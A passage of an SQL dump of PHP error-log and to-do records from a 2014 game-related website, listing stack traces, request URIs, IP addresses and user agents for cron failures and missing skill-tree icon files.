(KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (302, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n [2] => 11\n)\n', '63734773515d52c3bb2fdc0527450cbb28858cb5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 64, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 37.01722, '2014-11-27 20:42:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (303, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 65, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 37.02922, '2014-11-27 20:42:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (304, 'SYSTEM\\LOG\\ERROR', 'failed to insert into log archiev', '2e77103084621d523fe8cb0758d26efdc2651826', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 55, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 36.67721, '2014-11-27 21:44:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (305, 'SYSTEM\\LOG\\WARNING', 'Header already sent @ /home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php line 53', '8a598e0ca9b54ce3657c40f1c18ba443cd8b50ad', 1, '/home/web/webdir/mojotrollz/system/system/HEADER.php', 9, '#0 /home/web/webdir/mojotrollz/system/system/HEADER.php(15): SYSTEM\\HEADER::checkHeader()\n#1 /home/web/webdir/mojotrollz/system/log/result/JsonResult.php(29): SYSTEM\\HEADER::JSON()\n#2 /home/web/webdir/mojotrollz/system/log/result/JsonResult.php(48): SYSTEM\\LOG\\JsonResult::toString(Array, false)\n#3 /home/web/webdir/mojotrollz/system/log/error_handler/error_handler_jsonoutput.php(10): SYSTEM\\LOG\\JsonResult::error(Object(SYSTEM\\LOG\\ERROR_EXCEPTION))\n#4 [internal function]: SYSTEM\\LOG\\error_handler_jsonoutput::CALL(Object(SYSTEM\\LOG\\ERROR_EXCEPTION), Array)\n#5 /home/web/webdir/mojotrollz/system/log/log.php(27): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/log/log.php(36): SYSTEM\\LOG\\log::call_handlers(Object(SYSTEM\\LOG\\ERROR_EXCEPTION), Array)\n#7 [internal function]: SYSTEM\\LOG\\log::__error_handler(2, \'SQLite3::exec()...\', \'/home/web/webdi...\', 53, Array)\n#8 /home/web/webdir/mojotrollz/system/db/connection/ConnectionSQLite.php(53): SQLite3->exec(\'INSERT OR IGNOR...\')\n#9 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(46): SYSTEM\\DB\\ConnectionSQLite->exec(\'INSERT OR IGNOR...\')\n#10 /home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php(63): SYSTEM\\DB\\Connection->exec(\'INSERT OR IGNOR...\')\n#11 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#12 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#13 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#14 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#15 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#16 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#17 {main}', '37.24.148.240', 40.05333, '2014-11-27 22:06:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (454, 'ERROR', 'Could not insert visual.', '01cbc3555072b0dd9cc70731189ec95c74c381ce', 1, '/home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_visuals/saimod_mojotrollz_visuals.php', 39, '#0 [internal function]: saimod_mojotrollz_visuals::sai_mod_saimod_mojotrollz_visuals_action_insert(\'1\', \'0\', \'0\', \'White\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 01:23:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=insert&race=1&type=0&id=0&name=White', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_000000000000000000_00000000000000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 OPR/25.0.1614.63 (Edition FCD)', 14, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (306, 'Exception', 'Log Statistics-> Sqlite implementation', '110884093bd827b888a8b46739cadda3299a9f9f', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Log Statistics-...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-28 01:32:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Log%20Statistics-%3E%20Sqlite%20implementation', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (307, 'Exception', 'Todo-> Close all-> Statistics-> Visuals', '5a1e80e8db7f30ea730cfd2e61afd1dcd3ac78ad', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Todo-> Close al...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 01:33:29', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Todo-%3E%20Close%20all-%3E%20Statistics-%3E%20Visuals', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (308, 'Exception', 'Statesystem -> Tree', '17f650421040e4894b8547f49761c08b47474b6a', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Statesystem -> ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-28 01:34:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Statesystem%20-%3E%20Tree', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (309, 'Exception', 'Wizard -> Items', 'e67be5d93ca4989d5020b2b54cfaa0300096372b', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Wizard -> Items\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-28 01:34:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Wizard%20-%3E%20Items', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (310, 'Exception', 'Cron -> Last Visit (Log) -> Cron Entry', '26f32567deb62217f9c7d8ac5ebadb7a7034f8a6', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Cron -> Default...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-28 01:35:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Cron%20-%3E%20Default%200%20-%3E%20Last%20Visit%20(Log)%20-%3E%20Cron%20Entry', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (311, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_cleave.png\' found.', '89f90652e5f0e2a61f791d70944d775eef592a93', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.02, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_cleave.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 144, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (312, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_shadow_deathscream.png\' found.', '144592c54c2d9ab1c271ce384c9126e892d2d8a1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_shadow_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_shadow_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-11-28 10:42:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_shadow_deathscream.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (313, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_deathscream.png\' found.', '2f16a8affcaab82bc7cc671ebb456f8cfbaacee6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_de...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_de...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_deathscream.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 140, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (314, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_summonimp.png\' found.', 'f489996367ac8c5a23b0a7d7191340dec5228eda', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_su...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_su...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.024, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_summonimp.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 138, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (315, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_battleshout.png\' found.', 'a0a86ec1b1846d50504701838d6d773423aeda51', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.04, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_battleshout.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 136, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (316, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_dualwield.png\' found.', '8f790d40b6346be54f1ac0be07ff194e87856708', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_dualwie...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_dualwie...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_dualwield.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 134, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (317, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_48.png\' found.', '056e5f7064f8a032978bba634c264ba2f820bd26', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_48.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_48.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.012, '2014-12-13 21:51:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_sword_48.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 133, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (318, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_unholyfrenzy.png\' found.', '21b390a21da649c20f86cbcdb8c174aecfbcdef0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_un...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_un...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.02, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_unholyfrenzy.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 129, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (319, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warriordecesivestrike.png\' found.', '1779283986a4eea8e717008db065ddd2c382439d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): 